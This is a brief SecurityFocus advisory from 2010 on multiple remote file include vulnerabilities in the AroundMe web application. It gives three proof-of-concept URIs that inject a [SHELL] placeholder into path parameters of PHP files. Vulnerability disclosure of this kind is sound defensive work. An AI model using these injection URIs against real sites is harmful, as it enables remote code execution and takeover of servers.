AroundMe Multiple Remote File Include Vulnerabilities

Attackers can use a browser to exploit these issues.

The following proof-of-concept URIs are available:

http://www.example.com/path/aroundme/components/core/inc/core_profile.header.php?language_path_core=[SHELL]
http://www.example.com/path/components/core/template/barnraiser_01/maint_contact_view.tpl.php?template_path_core=[SHELL]
http://www.example.com/path/components/core/template/barnraiser_01/default.tpl.php?template_path=[SHELL]


 

Privacy Statement
Copyright 2010, SecurityFocus